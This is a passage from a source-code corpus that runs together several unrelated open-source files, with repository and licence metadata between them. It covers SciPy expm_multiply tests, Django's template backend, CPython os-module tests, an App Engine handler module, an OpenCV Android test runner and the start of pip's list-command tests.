                expected = scipy.linalg.expm(A).dot(B)
            assert_allclose(observed, expected)
    def test_complex(self):
        # Hand-computed expected result for a 2x2 upper-triangular
        # complex matrix applied to a complex vector.
        A = np.array([
            [1j, 1j],
            [0, 1j]], dtype=complex)
        B = np.array([1j, 1j])
        observed = expm_multiply(A, B)
        expected = np.array([
            1j * np.exp(1j) + 1j * (1j*np.cos(1) - np.sin(1)),
            1j * np.exp(1j)], dtype=complex)
        assert_allclose(observed, expected)
class TestExpmActionInterval(object):
    """Tests of expm_multiply evaluated over a linspace of time points."""
    def test_sparse_expm_multiply_interval(self):
        # Each returned slice X[i] must equal expm(t_i * A).dot(target).
        np.random.seed(1234)
        start = 0.1
        stop = 3.2
        n = 40
        k = 3
        endpoint = True
        for num in (14, 13, 2):
            A = scipy.sparse.rand(n, n, density=0.05)
            B = np.random.randn(n, k)
            v = np.random.randn(n)
            # Exercise both matrix and vector operands.
            for target in (B, v):
                X = expm_multiply(A, target,
                        start=start, stop=stop, num=num, endpoint=endpoint)
                samples = np.linspace(start=start, stop=stop,
                        num=num, endpoint=endpoint)
                with suppress_warnings() as sup:
                    # The dense reference computation triggers these warnings.
                    sup.filter(SparseEfficiencyWarning,
                               "splu requires CSC matrix format")
                    sup.filter(SparseEfficiencyWarning,
                               "spsolve is more efficient when sparse b is in the CSC matrix format")
                    for solution, t in zip(X, samples):
                        assert_allclose(solution,
                                scipy.linalg.expm(t*A).dot(target))
    def test_expm_multiply_interval_vector(self):
        # Vector operand, across several problem sizes and sample counts.
        np.random.seed(1234)
        start = 0.1
        stop = 3.2
        endpoint = True
        for num in (14, 13, 2):
            for n in (1, 2, 5, 20, 40):
                A = scipy.linalg.inv(np.random.randn(n, n))
                v = np.random.randn(n)
                X = expm_multiply(A, v,
                        start=start, stop=stop, num=num, endpoint=endpoint)
                samples = np.linspace(start=start, stop=stop,
                        num=num, endpoint=endpoint)
                for solution, t in zip(X, samples):
                    assert_allclose(solution, scipy.linalg.expm(t*A).dot(v))
    def test_expm_multiply_interval_matrix(self):
        # Matrix operand, across several problem sizes and sample counts.
        np.random.seed(1234)
        start = 0.1
        stop = 3.2
        endpoint = True
        for num in (14, 13, 2):
            for n in (1, 2, 5, 20, 40):
                for k in (1, 2):
                    A = scipy.linalg.inv(np.random.randn(n, n))
                    B = np.random.randn(n, k)
                    X = expm_multiply(A, B,
                            start=start, stop=stop, num=num, endpoint=endpoint)
                    samples = np.linspace(start=start, stop=stop,
                            num=num, endpoint=endpoint)
                    for solution, t in zip(X, samples):
                        assert_allclose(solution, scipy.linalg.expm(t*A).dot(B))
    def test_sparse_expm_multiply_interval_dtypes(self):
        # Integer/complex dtype combinations for A and B; diagonal matrices
        # make the exact exponential easy to construct.
        # Test A & B int
        A = scipy.sparse.diags(np.arange(5),format='csr', dtype=int)
        B = np.ones(5, dtype=int)
        Aexpm = scipy.sparse.diags(np.exp(np.arange(5)),format='csr')
        assert_allclose(expm_multiply(A,B,0,1)[-1], Aexpm.dot(B))
        # Test A complex, B int
        A = scipy.sparse.diags(-1j*np.arange(5),format='csr', dtype=complex)
        B = np.ones(5, dtype=int)
        Aexpm = scipy.sparse.diags(np.exp(-1j*np.arange(5)),format='csr')
        assert_allclose(expm_multiply(A,B,0,1)[-1], Aexpm.dot(B))
        # Test A int, B complex
        A = scipy.sparse.diags(np.arange(5),format='csr', dtype=int)
        B = np.full(5, 1j, dtype=complex)
        Aexpm = scipy.sparse.diags(np.exp(np.arange(5)),format='csr')
        assert_allclose(expm_multiply(A,B,0,1)[-1], Aexpm.dot(B))
    def test_expm_multiply_interval_status_0(self):
        self._help_test_specific_expm_interval_status(0)
    def test_expm_multiply_interval_status_1(self):
        self._help_test_specific_expm_interval_status(1)
    def test_expm_multiply_interval_status_2(self):
        self._help_test_specific_expm_interval_status(2)
    def _help_test_specific_expm_interval_status(self, target_status):
        # Generate random problems until some yield the requested internal
        # status code, then verify the full solution for those cases.
        # Fails loudly if no problem with the target status is ever found.
        np.random.seed(1234)
        start = 0.1
        stop = 3.2
        num = 13
        endpoint = True
        n = 5
        k = 2
        nrepeats = 10
        nsuccesses = 0
        for num in [14, 13, 2] * nrepeats:
            A = np.random.randn(n, n)
            B = np.random.randn(n, k)
            status = _expm_multiply_interval(A, B,
                    start=start, stop=stop, num=num, endpoint=endpoint,
                    status_only=True)
            if status == target_status:
                X, status = _expm_multiply_interval(A, B,
                        start=start, stop=stop, num=num, endpoint=endpoint,
                        status_only=False)
                assert_equal(X.shape, (num, n, k))
                samples = np.linspace(start=start, stop=stop,
                        num=num, endpoint=endpoint)
                for solution, t in zip(X, samples):
                    assert_allclose(solution, scipy.linalg.expm(t*A).dot(B))
                nsuccesses += 1
        if not nsuccesses:
            msg = 'failed to find a status-' + str(target_status) + ' interval'
            raise Exception(msg)
| bsd-3-clause |
liu602348184/django | django/template/backends/django.py | 240 | 5574 | # Since this package contains a "django" module, this is required on Python 2.
from __future__ import absolute_import
import sys
import warnings
from importlib import import_module
from pkgutil import walk_packages
from django.apps import apps
from django.conf import settings
from django.template import TemplateDoesNotExist
from django.template.context import Context, RequestContext, make_context
from django.template.engine import Engine, _dirs_undefined
from django.template.library import InvalidTemplateLibrary
from django.utils import six
from django.utils.deprecation import RemovedInDjango110Warning
from .base import BaseEngine
class DjangoTemplates(BaseEngine):
    """Template backend wrapping the classic Django template Engine."""
    # Subdirectory of each installed app that is searched for templates.
    app_dirname = 'templates'
    def __init__(self, params):
        # Copy before popping so the caller's dict is not mutated.
        params = params.copy()
        options = params.pop('OPTIONS').copy()
        # Fall back to the global settings when OPTIONS does not override.
        options.setdefault('debug', settings.DEBUG)
        options.setdefault('file_charset', settings.FILE_CHARSET)
        # Merge custom tag libraries with those discovered in installed apps.
        libraries = options.get('libraries', {})
        options['libraries'] = self.get_templatetag_libraries(libraries)
        super(DjangoTemplates, self).__init__(params)
        self.engine = Engine(self.dirs, self.app_dirs, **options)
    def from_string(self, template_code):
        """Compile template_code and wrap it in a backend-aware Template."""
        return Template(self.engine.from_string(template_code), self)
    def get_template(self, template_name, dirs=_dirs_undefined):
        """Load template_name, attaching backend info on TemplateDoesNotExist."""
        try:
            return Template(self.engine.get_template(template_name, dirs), self)
        except TemplateDoesNotExist as exc:
            reraise(exc, self)
    def get_templatetag_libraries(self, custom_libraries):
        """
        Return a collation of template tag libraries from installed
        applications and the supplied custom_libraries argument.
        custom_libraries entries take precedence over discovered ones.
        """
        libraries = get_installed_libraries()
        libraries.update(custom_libraries)
        return libraries
class Template(object):
    """Wrapper binding a compiled django.template.Template to its backend."""
    def __init__(self, template, backend):
        self.template = template
        self.backend = backend
    @property
    def origin(self):
        # Expose the wrapped template's origin for debugging tooling.
        return self.template.origin
    def render(self, context=None, request=None):
        """Render the template with a dict context and optional request."""
        # A deprecation path is required here to cover the following usage:
        # >>> from django.template import Context
        # >>> from django.template.loader import get_template
        # >>> template = get_template('hello.html')
        # >>> template.render(Context({'name': 'world'}))
        # In Django 1.7 get_template() returned a django.template.Template.
        # In Django 1.8 it returns a django.template.backends.django.Template.
        # In Django 1.10 the isinstance checks should be removed. If passing a
        # Context or a RequestContext works by accident, it won't be an issue
        # per se, but it won't be officially supported either.
        if isinstance(context, RequestContext):
            if request is not None and request is not context.request:
                raise ValueError(
                    "render() was called with a RequestContext and a request "
                    "argument which refer to different requests. Make sure "
                    "that the context argument is a dict or at least that "
                    "the two arguments refer to the same request.")
            warnings.warn(
                "render() must be called with a dict, not a RequestContext.",
                RemovedInDjango110Warning, stacklevel=2)
        elif isinstance(context, Context):
            warnings.warn(
                "render() must be called with a dict, not a Context.",
                RemovedInDjango110Warning, stacklevel=2)
        else:
            # Normal, supported path: build a real Context from the dict.
            context = make_context(context, request)
        try:
            return self.template.render(context)
        except TemplateDoesNotExist as exc:
            reraise(exc, self.backend)
def reraise(exc, backend):
    """
    Reraise TemplateDoesNotExist while maintaining template debug information.
    """
    # Rebuild the exception so it records which backend failed; 'tried'
    # carries over the list of locations that were searched.
    new = exc.__class__(*exc.args, tried=exc.tried, backend=backend)
    if hasattr(exc, 'template_debug'):
        new.template_debug = exc.template_debug
    # six.reraise re-raises with the original traceback on Python 2 and 3.
    six.reraise(exc.__class__, new, sys.exc_info()[2])
def get_installed_libraries():
    """
    Return the built-in template tag libraries and those from installed
    applications. Libraries are stored in a dictionary where keys are the
    individual module names, not the full module paths. Example:
    django.templatetags.i18n is stored as i18n.
    """
    found = {}
    candidates = ['django.templatetags'] + [
        '%s.templatetags' % app_config.name
        for app_config in apps.get_app_configs()]
    for candidate in candidates:
        try:
            pkg = import_module(candidate)
        except ImportError:
            # The app defines no templatetags package; that's fine.
            continue
        if not hasattr(pkg, '__path__'):
            # A plain module (not a package) cannot contain libraries.
            continue
        # Strip the "<candidate>." prefix to get the short library name.
        prefix_len = len(candidate) + 1
        for module_name in get_package_libraries(pkg):
            found[module_name[prefix_len:]] = module_name
    return found
def get_package_libraries(pkg):
    """
    Recursively yield template tag libraries defined in submodules of a
    package.
    """
    for finder, module_path, is_pkg in walk_packages(pkg.__path__, pkg.__name__ + '.'):
        try:
            module = import_module(module_path)
        except ImportError as e:
            raise InvalidTemplateLibrary(
                "Invalid template library specified. ImportError raised when "
                "trying to load '%s': %s" % (module_path, e)
            )
        # A template tag library is any module exposing a `register` object.
        if hasattr(module, 'register'):
            yield module_path
| bsd-3-clause |
mancoast/CPythonPyc_test | cpython/232_test_os.py | 4 | 10718 | # As a test suite for the os module, this is woefully inadequate, but this
# does add tests for a few functions which have been determined to be more
# more portable than they had been thought to be.
import os
import unittest
import warnings
from test import test_support
# Silence the RuntimeWarnings that referencing os.tempnam/os.tmpnam emits,
# so importing this test module stays quiet.
warnings.filterwarnings("ignore", "tempnam", RuntimeWarning, __name__)
warnings.filterwarnings("ignore", "tmpnam", RuntimeWarning, __name__)
class TemporaryFileTests(unittest.TestCase):
    """Tests for os.tempnam(), os.tmpfile() and os.tmpnam()."""
    def setUp(self):
        # Track files we create so tearDown can remove them.
        self.files = []
        os.mkdir(test_support.TESTFN)
    def tearDown(self):
        for name in self.files:
            os.unlink(name)
        os.rmdir(test_support.TESTFN)
    def check_tempfile(self, name):
        # make sure it doesn't already exist:
        self.failIf(os.path.exists(name),
                    "file already exists for temporary file")
        # make sure we can create the file
        open(name, "w")
        self.files.append(name)
    def test_tempnam(self):
        # Silently skip on platforms without os.tempnam.
        if not hasattr(os, "tempnam"):
            return
        warnings.filterwarnings("ignore", "tempnam", RuntimeWarning,
                                r"test_os$")
        self.check_tempfile(os.tempnam())
        name = os.tempnam(test_support.TESTFN)
        self.check_tempfile(name)
        # A prefix argument must appear at the start of the basename.
        name = os.tempnam(test_support.TESTFN, "pfx")
        self.assert_(os.path.basename(name)[:3] == "pfx")
        self.check_tempfile(name)
    def test_tmpfile(self):
        if not hasattr(os, "tmpfile"):
            return
        # tmpfile() returns an open file object; written data must read back.
        fp = os.tmpfile()
        fp.write("foobar")
        fp.seek(0,0)
        s = fp.read()
        fp.close()
        self.assert_(s == "foobar")
    def test_tmpnam(self):
        import sys
        if not hasattr(os, "tmpnam"):
            return
        warnings.filterwarnings("ignore", "tmpnam", RuntimeWarning,
                                r"test_os$")
        name = os.tmpnam()
        if sys.platform in ("win32",):
            # The Windows tmpnam() seems useless.  From the MS docs:
            #
            #     The character string that tmpnam creates consists of
            #     the path prefix, defined by the entry P_tmpdir in the
            #     file STDIO.H, followed by a sequence consisting of the
            #     digit characters '0' through '9'; the numerical value
            #     of this string is in the range 1 - 65,535.  Changing the
            #     definitions of L_tmpnam or P_tmpdir in STDIO.H does not
            #     change the operation of tmpnam.
            #
            # The really bizarre part is that, at least under MSVC6,
            # P_tmpdir is "\\".  That is, the path returned refers to
            # the root of the current drive.  That's a terrible place to
            # put temp files, and, depending on privileges, the user
            # may not even be able to open a file in the root directory.
            self.failIf(os.path.exists(name),
                        "file already exists for temporary file")
        else:
            self.check_tempfile(name)
# Test attributes on return values from os.*stat* family.
class StatAttributeTests(unittest.TestCase):
    """Check named-attribute access on os.stat()/os.statvfs() results."""
    def setUp(self):
        # Create a 3-byte file whose size the tests can assert on.
        os.mkdir(test_support.TESTFN)
        self.fname = os.path.join(test_support.TESTFN, "f1")
        f = open(self.fname, 'wb')
        f.write("ABC")
        f.close()
    def tearDown(self):
        os.unlink(self.fname)
        os.rmdir(test_support.TESTFN)
    def test_stat_attributes(self):
        if not hasattr(os, "stat"):
            return
        import stat
        result = os.stat(self.fname)
        # Make sure direct access works
        self.assertEquals(result[stat.ST_SIZE], 3)
        self.assertEquals(result.st_size, 3)
        import sys
        # Make sure all the attributes are there
        members = dir(result)
        for name in dir(stat):
            if name[:3] == 'ST_':
                attr = name.lower()
                # Index access and attribute access must agree.
                self.assertEquals(getattr(result, attr),
                                  result[getattr(stat, name)])
                self.assert_(attr in members)
        # Out-of-range indexing must raise IndexError.
        try:
            result[200]
            self.fail("No exception thrown")
        except IndexError:
            pass
        # Make sure that assignment fails
        try:
            result.st_mode = 1
            self.fail("No exception thrown")
        except TypeError:
            pass
        try:
            result.st_rdev = 1
            self.fail("No exception thrown")
        except (AttributeError, TypeError):
            pass
        try:
            result.parrot = 1
            self.fail("No exception thrown")
        except AttributeError:
            pass
        # Use the stat_result constructor with a too-short tuple.
        try:
            result2 = os.stat_result((10,))
            self.fail("No exception thrown")
        except TypeError:
            pass
        # Use the constructor with a too-long tuple.
        try:
            result2 = os.stat_result((0,1,2,3,4,5,6,7,8,9,10,11,12,13,14))
        except TypeError:
            pass
    def test_statvfs_attributes(self):
        if not hasattr(os, "statvfs"):
            return
        import statvfs
        try:
            result = os.statvfs(self.fname)
        except OSError, e:
            # On AtheOS, glibc always returns ENOSYS
            import errno
            if e.errno == errno.ENOSYS:
                return
        # Make sure direct access works
        self.assertEquals(result.f_bfree, result[statvfs.F_BFREE])
        # Make sure all the attributes are there
        members = dir(result)
        for name in dir(statvfs):
            if name[:2] == 'F_':
                attr = name.lower()
                self.assertEquals(getattr(result, attr),
                                  result[getattr(statvfs, name)])
                self.assert_(attr in members)
        # Make sure that assignment really fails
        try:
            result.f_bfree = 1
            self.fail("No exception thrown")
        except TypeError:
            pass
        try:
            result.parrot = 1
            self.fail("No exception thrown")
        except AttributeError:
            pass
        # Use the constructor with a too-short tuple.
        try:
            result2 = os.statvfs_result((10,))
            self.fail("No exception thrown")
        except TypeError:
            pass
        # Use the constructor with a too-long tuple.
        try:
            result2 = os.statvfs_result((0,1,2,3,4,5,6,7,8,9,10,11,12,13,14))
        except TypeError:
            pass
from test_userdict import TestMappingProtocol
class EnvironTests(TestMappingProtocol):
    """check that os.environ object conform to mapping protocol"""
    _tested_class = None
    def _reference(self):
        # Small known mapping used by the inherited protocol tests.
        return {"KEY1":"VALUE1", "KEY2":"VALUE2", "KEY3":"VALUE3"}
    def _empty_mapping(self):
        os.environ.clear()
        return os.environ
    def setUp(self):
        # Preserve the real environment so the tests can mutate it freely.
        self.__save = dict(os.environ)
        os.environ.clear()
    def tearDown(self):
        # Restore the environment captured in setUp.
        os.environ.clear()
        os.environ.update(self.__save)
class WalkTests(unittest.TestCase):
    """Tests for os.walk()."""
    def test_traversal(self):
        import os
        from os.path import join
        # Build:
        #     TESTFN/            a file kid and two directory kids
        #         tmp1
        #         SUB1/          a file kid and a directory kid
        #             tmp2
        #             SUB11/     no kids
        #         SUB2/          just a file kid
        #             tmp3
        sub1_path = join(test_support.TESTFN, "SUB1")
        sub11_path = join(sub1_path, "SUB11")
        sub2_path = join(test_support.TESTFN, "SUB2")
        tmp1_path = join(test_support.TESTFN, "tmp1")
        tmp2_path = join(sub1_path, "tmp2")
        tmp3_path = join(sub2_path, "tmp3")
        # Create stuff.
        os.makedirs(sub11_path)
        os.makedirs(sub2_path)
        for path in tmp1_path, tmp2_path, tmp3_path:
            f = file(path, "w")
            f.write("I'm " + path + " and proud of it. Blame test_os.\n")
            f.close()
        # Walk top-down.
        all = list(os.walk(test_support.TESTFN))
        self.assertEqual(len(all), 4)
        # We can't know which order SUB1 and SUB2 will appear in.
        # Not flipped: TESTFN, SUB1, SUB11, SUB2
        #     flipped: TESTFN, SUB2, SUB1, SUB11
        # (bool is an int subclass, so 'flipped' is used in index math below)
        flipped = all[0][1][0] != "SUB1"
        all[0][1].sort()
        self.assertEqual(all[0], (test_support.TESTFN, ["SUB1", "SUB2"], ["tmp1"]))
        self.assertEqual(all[1 + flipped], (sub1_path, ["SUB11"], ["tmp2"]))
        self.assertEqual(all[2 + flipped], (sub11_path, [], []))
        self.assertEqual(all[3 - 2 * flipped], (sub2_path, [], ["tmp3"]))
        # Prune the search.
        all = []
        for root, dirs, files in os.walk(test_support.TESTFN):
            all.append((root, dirs, files))
            # Don't descend into SUB1.
            if 'SUB1' in dirs:
                # Note that this also mutates the dirs we appended to all!
                dirs.remove('SUB1')
        self.assertEqual(len(all), 2)
        self.assertEqual(all[0], (test_support.TESTFN, ["SUB2"], ["tmp1"]))
        self.assertEqual(all[1], (sub2_path, [], ["tmp3"]))
        # Walk bottom-up.
        all = list(os.walk(test_support.TESTFN, topdown=False))
        self.assertEqual(len(all), 4)
        # We can't know which order SUB1 and SUB2 will appear in.
        # Not flipped: SUB11, SUB1, SUB2, TESTFN
        #     flipped: SUB2, SUB11, SUB1, TESTFN
        flipped = all[3][1][0] != "SUB1"
        all[3][1].sort()
        self.assertEqual(all[3], (test_support.TESTFN, ["SUB1", "SUB2"], ["tmp1"]))
        self.assertEqual(all[flipped], (sub11_path, [], []))
        self.assertEqual(all[flipped + 1], (sub1_path, ["SUB11"], ["tmp2"]))
        self.assertEqual(all[2 - 2 * flipped], (sub2_path, [], ["tmp3"]))
        # Tear everything down. This is a decent use for bottom-up on
        # Windows, which doesn't have a recursive delete command. The
        # (not so) subtlety is that rmdir will fail unless the dir's
        # kids are removed first, so bottom up is essential.
        for root, dirs, files in os.walk(test_support.TESTFN, topdown=False):
            for name in files:
                os.remove(join(root, name))
            for name in dirs:
                os.rmdir(join(root, name))
        os.rmdir(test_support.TESTFN)
def test_main():
    # Run every test class in this module through the test_support driver.
    test_support.run_unittest(
        TemporaryFileTests,
        StatAttributeTests,
        EnvironTests,
        WalkTests
    )
if __name__ == "__main__":
    test_main()
| gpl-3.0 |
shteeven/conference | main.py | 1 | 1566 | #!/usr/bin/env python
"""
main.py -- Udacity conference server-side Python App Engine
HTTP controller handlers for memcache & task queue access
"""
__author__ = 'stevenbarnhurst@gmail.com (Steven Barnhurst)'
import webapp2
from google.appengine.api import app_identity
from google.appengine.api import mail
from conference import ConferenceApi
class SetAnnouncementHandler(webapp2.RequestHandler):
    def get(self):
        """Set Announcement in Memcache."""
        # Delegates to the API class; mapped to /crons/set_announcement below.
        ConferenceApi._cacheAnnouncement()
        # 204: handled successfully, no response body needed.
        self.response.set_status(204)
class SendConfirmationEmailHandler(webapp2.RequestHandler):
    def post(self):
        """Send email confirming Conference creation."""
        # Recipient and conference details arrive as task payload fields.
        mail.send_mail(
            'noreply@%s.appspotmail.com' % (
                app_identity.get_application_id()),     # from
            self.request.get('email'),                  # to
            'You created a new Conference!',            # subj
            'Hi, you have created a following '         # body
            'conference:\r\n\r\n%s' % self.request.get(
                'conferenceInfo')
        )
class SetFeaturedSpeakerHandler(webapp2.RequestHandler):
    def post(self):
        """Set featured speaker in Memcache."""
        # (Docstring previously said "Announcement" — a copy/paste slip;
        # the handler caches the featured speaker.)
        ConferenceApi._cacheFeaturedSpeaker(self.request)
        # 204: handled successfully, no response body needed.
        self.response.set_status(204)
# Route cron ('/crons/...') and task-queue ('/tasks/...') URLs to handlers.
app = webapp2.WSGIApplication([
    ('/crons/set_announcement', SetAnnouncementHandler),
    ('/tasks/send_confirmation_email', SendConfirmationEmailHandler),
    ('/tasks/set_featured_speaker', SetFeaturedSpeakerHandler),
], debug=True)
| apache-2.0 |
BonexGu/Blik2D-SDK | Blik2D/addon/opencv-3.1.0_for_blik/modules/ts/misc/run_android.py | 7 | 8267 | #!/usr/bin/env python
import sys
from run_utils import *
from run_suite import TestSuite
def exe(program):
    """Append the platform executable suffix (".exe" when hostos is 'nt')."""
    if hostos == 'nt':
        return program + ".exe"
    return program
class ApkInfo:
    """Package metadata extracted from an APK manifest."""
    def __init__(self):
        # All fields start empty; Aapt.dump() fills them in.
        self.pkg_name = None
        self.pkg_target = None
        self.pkg_runner = None
    def forcePackage(self, package):
        """Override the target package; a leading '.' appends a sub-package."""
        if not package:
            return
        if package.startswith("."):
            self.pkg_target += package
        else:
            self.pkg_target = package
#==============================================================================
class Tool:
    """Base wrapper around an external command-line tool."""
    def __init__(self):
        # Command prefix (program path plus fixed args); subclasses fill it.
        self.cmd = []
    def run(self, args = [], silent = False):
        """Execute the tool with `args` appended and return its output.

        The previous implementation built a local copy of the command and
        then ignored it, passing `self.cmd + args` to execute(); the dead
        local has been removed so the command is built exactly once.
        """
        cmd = self.cmd + args
        return execute(cmd, silent)
#==============================================================================
class Adb(Tool):
    """Wrapper around the Android Debug Bridge (adb) command-line tool."""
    def __init__(self, sdk_dir):
        Tool.__init__(self)
        # Prefer the adb binary bundled with the SDK, if it is executable.
        exe_path = os.path.join(sdk_dir, exe("platform-tools/adb"))
        if not os.path.isfile(exe_path) or not os.access(exe_path, os.X_OK):
            exe_path = None
        # fix adb tool location: fall back to a running adb, then to PATH.
        if not exe_path:
            exe_path = getRunningProcessExePathByName("adb")
        if not exe_path:
            exe_path = "adb"
        self.cmd = [exe_path]
        self.cpuinfo = ""
    def init(self, serial):
        # remember current device serial. Needed if another device is connected while this script runs
        if not serial:
            serial = self.detectSerial()
        if serial:
            self.cmd.extend(["-s", serial])
        # read device cpuinfo; later hardware checks parse this text.
        self.cpuinfo = self.run(["shell", "cat /proc/cpuinfo"], silent = True)
        if not self.cpuinfo:
            raise Err("Can not get cpuinfo from Android device")
    def detectSerial(self):
        """Return the serial of the single attached device, or raise Err."""
        adb_res = self.run(["devices"], silent = True)
        # assume here that device name may consists of any characters except newline
        connected_devices = re.findall(r"^[^\n]+[ \t]+device\r?$", adb_res, re.MULTILINE)
        if not connected_devices:
            raise Err("Can not find Android device")
        elif len(connected_devices) != 1:
            raise Err("Too many (%s) devices are connected. Please specify single device using --serial option:\n\n%s", len(connected_devices), adb_res)
        else:
            return connected_devices[0].split("\t")[0]
    def getOSIdentifier(self):
        # "Android" + the release string read from the device property.
        return "Android" + self.run(["shell", "getprop ro.build.version.release"], silent = True).strip()
    def getHardware(self):
        # Extract the "Hardware" line from the cpuinfo captured in init().
        hw = re.search(r"^Hardware[ \t]*:[ \t]*(.*?)$", self.cpuinfo, re.MULTILINE)
        if hw:
            return hw.group(1).strip()
    def checkArmHardware(self, expected_abi):
        # Refuse to run armeabi-v7a/NEON binaries on devices whose cpuinfo
        # does not advertise the required features.
        if expected_abi and "armeabi-v7a" in expected_abi:
            if "ARMv7" not in self.cpuinfo:
                raise Err("Android device does not support ARMv7 commands, but tests are built for armeabi-v7a")
            if "NEON" in expected_abi and "neon" not in self.cpuinfo:
                raise Err("Android device has no NEON, but tests are built for %s", expected_abi)
#==============================================================================
class Aapt(Tool):
    """Wrapper around the aapt tool, used to inspect APK manifests."""
    def __init__(self, sdk_dir):
        Tool.__init__(self)
        aapt_fn = exe("aapt")
        aapt = None
        # aapt lives under one of the versioned build-tools directories.
        for r, ds, fs in os.walk( os.path.join(sdk_dir, 'build-tools') ):
            if aapt_fn in fs:
                aapt = os.path.join(r, aapt_fn)
                break
        if not aapt:
            raise Err("Can not find aapt tool: %s", aapt_fn)
        self.cmd = [aapt]
    def dump(self, exe):
        """Parse AndroidManifest.xml of the given APK into an ApkInfo."""
        res = ApkInfo()
        output = self.run(["dump", "xmltree", exe, "AndroidManifest.xml"], silent = True)
        if not output:
            raise Err("Can not dump manifest from %s", exe)
        # Each element in the xmltree dump starts with "E: ".
        tags = re.split(r"[ ]+E: ", output)
        # get package name
        manifest_tag = [t for t in tags if t.startswith("manifest ")]
        if not manifest_tag:
            raise Err("Can not read package name from: %s", exe)
        res.pkg_name = re.search(r"^[ ]+A: package=\"(?P<pkg>.*?)\" \(Raw: \"(?P=pkg)\"\)\r?$", manifest_tag[0], flags=re.MULTILINE).group("pkg")
        # get test instrumentation info
        instrumentation_tag = [t for t in tags if t.startswith("instrumentation ")]
        if not instrumentation_tag:
            raise Err("Can not find instrumentation detials in: %s", exe)
        res.pkg_runner = re.search(r"^[ ]+A: android:name\(0x[0-9a-f]{8}\)=\"(?P<runner>.*?)\" \(Raw: \"(?P=runner)\"\)\r?$", instrumentation_tag[0], flags=re.MULTILINE).group("runner")
        res.pkg_target = re.search(r"^[ ]+A: android:targetPackage\(0x[0-9a-f]{8}\)=\"(?P<pkg>.*?)\" \(Raw: \"(?P=pkg)\"\)\r?$", instrumentation_tag[0], flags=re.MULTILINE).group("pkg")
        if not res.pkg_name or not res.pkg_runner or not res.pkg_target:
            raise Err("Can not find instrumentation detials in: %s", exe)
        return res
#===================================================================================================
class AndroidTestSuite(TestSuite):
    """TestSuite that deploys and runs test APKs/binaries on an Android device."""
    def __init__(self, options, cache, android_env = {}):
        TestSuite.__init__(self, options, cache)
        # Locate the SDK: CLI option, then environment, then the cached adb path.
        sdk_dir = options.android_sdk or os.environ.get("ANDROID_SDK", False) or os.path.dirname(os.path.dirname(self.cache.android_executable))
        log.debug("Detecting Android tools in directory: %s", sdk_dir)
        self.adb = Adb(sdk_dir)
        self.aapt = Aapt(sdk_dir)
        self.env = android_env
    def isTest(self, fullpath):
        # A test is either an APK or any executable file.
        if os.path.isfile(fullpath):
            if fullpath.endswith(".apk") or os.access(fullpath, os.X_OK):
                return True
        return False
    def getOS(self):
        return self.adb.getOSIdentifier()
    def getHardware(self):
        return [self.adb.getHardware()]
    def checkPrerequisites(self):
        # Bind to the device and verify its CPU matches the build ABI.
        self.adb.init(self.options.serial)
        self.adb.checkArmHardware(self.cache.android_abi)
    def runTest(self, path, logfile, workingDir, args = []):
        """Run one test: an APK via instrumentation, or a native binary via shell."""
        args = args[:]
        exe = os.path.abspath(path)
        if exe.endswith(".apk"):
            # Reinstall the package, then launch its instrumentation runner.
            info = self.aapt.dump(exe)
            if not info:
                raise Err("Can not read info from test package: %s", exe)
            info.forcePackage(self.options.package)
            self.adb.run(["uninstall", info.pkg_name])
            output = self.adb.run(["install", exe], silent = True)
            if not (output and "Success" in output):
                raise Err("Can not install package: %s", exe)
            params = ["-e package %s" % info.pkg_target]
            ret = self.adb.run(["shell", "am instrument -w %s %s/%s" % (" ".join(params), info.pkg_name, info.pkg_runner)])
            return None, ret
        else:
            # Native executable: push to the device, run it there, pull the log back.
            device_dir = getpass.getuser().replace(" ","") + "_" + self.options.mode +"/"
            if isColorEnabled(args):
                args.append("--gtest_color=yes")
            tempdir = "/data/local/tmp/"
            android_dir = tempdir + device_dir
            exename = os.path.basename(exe)
            android_exe = android_dir + exename
            self.adb.run(["push", exe, android_exe])
            self.adb.run(["shell", "chmod 777 " + android_exe])
            env_pieces = ["export %s=%s" % (a,b) for a,b in self.env.items()]
            pieces = ["cd %s" % android_dir, "./%s %s" % (exename, " ".join(args))]
            log.warning("Run: %s" % " && ".join(pieces))
            ret = self.adb.run(["shell", " && ".join(env_pieces + pieces)])
            # try get log
            hostlogpath = os.path.join(workingDir, logfile)
            self.adb.run(["pull", android_dir + logfile, hostlogpath])
            # cleanup
            self.adb.run(["shell", "rm " + android_dir + logfile])
            self.adb.run(["shell", "rm " + tempdir + "__opencv_temp.*"], silent = True)
            if os.path.isfile(hostlogpath):
                return hostlogpath, ret
            return None, ret
#===================================================================================================
# This module is a library for run.py; invoking it directly is an error.
if __name__ == "__main__":
    log.error("This is utility file, please execute run.py script")
| mit |
willingc/pip | tests/functional/test_list.py | 5 | 5581 | import os
import pytest
def test_list_command(script, data):
    """`pip list` shows every installed distribution with its version."""
    script.pip('install', '-f', data.find_links, '--no-index',
               'simple==1.0', 'simple2==3.0')
    listing = script.pip('list')
    for expected_line in ('simple (1.0)', 'simple2 (3.0)'):
        assert expected_line in listing.stdout, str(listing)
def test_local_flag(script, data):
    """`pip list --local` includes packages installed into the environment."""
    script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
    local_listing = script.pip('list', '--local')
    assert 'simple (1.0)' in local_listing.stdout
def test_user_flag(script, data, virtualenv):
    """`pip list --user` lists only packages installed into the user site."""
    virtualenv.system_site_packages = True
    # One package goes into the environment, the other into the user site.
    script.pip('install', '-f', data.find_links, '--no-index', 'simple==1.0')
    script.pip('install', '-f', data.find_links, '--no-index',
               '--user', 'simple2==2.0')
    user_listing = script.pip('list', '--user')
    assert 'simple (1.0)' not in user_listing.stdout
    assert 'simple2 (2.0)' in user_listing.stdout
@pytest.mark.network
def test_uptodate_flag(script, data):
    """
    Test the behavior of --uptodate flag in the list command
    """
    script.pip(
        'install', '-f', data.find_links, '--no-index', 'simple==1.0',
        'simple2==3.0',
    )
    script.pip(
        'install', '-e',
        'git+https://github.com/pypa/pip-test-package.git#egg=pip-test-package'
    )
    result = script.pip(
        'list', '-f', data.find_links, '--no-index', '--uptodate',
        expect_stderr=True,
    )
    # simple==1.0 is outdated (3.0 exists in find_links), so it is filtered.
    assert 'simple (1.0)' not in result.stdout  # 3.0 is latest
    assert 'pip-test-package (0.1.1,' in result.stdout  # editables included
    assert 'simple2 (3.0)' in result.stdout, str(result)
@pytest.mark.network
def test_outdated_flag(script, data):
    """
    Test the behavior of --outdated flag in the list command
    """
    script.pip(
        'install', '-f', data.find_links, '--no-index', 'simple==1.0',
        'simple2==3.0', 'simplewheel==1.0',
    )
    # Install an editable checkout pinned at the older 0.1 tag.
    script.pip(
        'install', '-e',
        'git+https://github.com/pypa/pip-test-package.git'
